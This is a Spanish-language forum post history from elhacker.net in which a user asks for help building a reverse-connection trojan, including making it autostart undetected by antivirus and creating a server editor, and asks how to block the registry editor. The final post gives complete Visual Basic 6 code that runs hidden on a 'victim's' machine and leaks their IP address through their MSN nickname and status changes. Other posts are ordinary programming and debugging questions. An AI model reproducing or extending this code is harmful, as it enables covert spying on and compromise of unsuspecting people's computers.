elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Temas
Páginas: [1]
1  Programación / Ingeniería Inversa / Error con al abrir un programa con el olly en: 17 Diciembre 2008, 22:03 pm
Buenas! soy novato en esto del tema de la ingenieria inversa pero en estos dias me dio por experimentar ;D hoy me surgio un problema tratando de abrir un programa con el olly, que nunca me habia pasado antes tratando de abrir otros programas, bueno voy al grano, cuando intento abrir el programa con el olly no termina de cargar todo , se tranca y me sale este error:

"Unable to read memory of debuged process. Breakpoint at 57335800 is deleted"

Esto a que se puede deber? a que esta protegido con algo o alguna otra cosa? lo analize con el peid y no detecto ninguna encriptacion y cuando lo analize con el rdg packer detector con el metodo rapido me detecto el "wind of crypt v1.0" luego con el metodo potente detecto el "NT packer". Esto me carga muy confundido xD. Gracias por su tiempo! ;D
2  Programación / Programación Visual Basic / ayuda con winsock en: 27 Marzo 2006, 03:55 am
disculpen mi curiosidad pero hay alguna forma de dejar de depender del winsock sin tener que usar la api del winsock es que esta me ha traido varios problemas????
3  Programación / Programación Visual Basic / Api de winsock en: 26 Marzo 2006, 07:31 am
No se que pasa ya me estoy desesperando, estoy intentando hacer un troyano con las apis de winsock, todo funciona bien cuando lo pruebo conmigo mismo, pero cuando le envio el server a alguien este no se conecta a mi y estoy seguro de que lo abre :S, alguna idea de lo que pasa????????.

nota: el troyano es de conexion inversa
4  Programación / Programación Visual Basic / Ayuda con listbox en: 12 Marzo 2006, 06:57 am
Como hago para copiar el contenido de un listbox a un textbox???
5  Programación / Programación Visual Basic / necesito ayuda con mi troyano en: 5 Marzo 2006, 05:58 am
Alguien sabe como hacer que este se inicie cada vez que prenda la computadora ( esto ya lo se hacer ) pero sin que los antivirus lo detecten, ya que estos lo detectan  debido a que este se agrega a un registro de windows . Si alguien conoce una forma para que este se inicie junto con windows y no sea detectado debido a esto me gustaria que la publicara.
6  Programación / Programación Visual Basic / regedit en: 2 Marzo 2006, 02:59 am
Alguien tiene idea de como bloquear o desbloquear el modoficador de registro de windows (xp) usando visual basic 6.0????????
7  Programación / Programación Visual Basic / Editor Del Server en: 20 Febrero 2006, 05:54 am
Hola necesito que porfavor alguien me explique como podria crear un editor para el server de mi troyano, ya que yo cree mi propio troyano en vb con conexion inversa pero no tengo idea como crear un editor para este. Yo se que esto es incomodo para muchos, que yo les pida esto pero espero que alguien me pueda ayudar.
8  Programación / Programación Visual Basic / Notificacion de la IP de tu victima por MSN en: 12 Febrero 2006, 06:12 am
-Bueno aqui les traigo una idea para hacer que cuando la victima ejecute este programa su nick cambie de nombre  colocando el ip de este en su nick y que cada 10 segundos te aparescan 3 ventanitas mostrando el ip de la victma. Aqui les va el codigo:

Necesitas primero tener:

-El form con la propiedad visible en false
-2 command button
-1 textbox
-2 timer
  *El timer 1 con interval 9000,la propiedad enabled en false.
  *El timer 2 con interval 10000,la propiedad enabled en false.
-1 Winsock
-Agregar a las referencias del proyecto: Messenger APY Type Library

------------------------------------------------------------------------
Private WithEvents MSN As MessengerAPI.Messenger

Private Sub Form_Load()
Set MSN = New MessengerAPI.Messenger
Text1.Text = Winsock1.LocalIP     
Timer1.Enabled = True
End Sub

Private Sub Timer1_Timer()
Call command1_click
End Sub

Private Sub command1_click()
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys Text1.Text & vbCrLf
Call Command2_Click
End Sub

Private Sub Command2_Click()
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys Text1.Text & vbCrLf
Timer2.Enabled = True
End Sub

Private Sub Timer2_Timer()
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
MSN.MyStatus = MISTATUS_INVISIBLE
MSN.MyStatus = MISTATUS_ONLINE
End Sub

A lo mejor algunos se preguntaran porque use dos command button si tienen el mismo uso??, Pues lo hice simplemente para estar mas seguro de que se cambio el nick correctamente porque cuando lo intente con un solo command button aveces no me funcionaba, pero les recomiendo que dejen el codigo como se los puse, aunque ustedes son libres de cambiarlo a su preferencia siempre y cuando digan quien fue la fuente (Redshots).

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines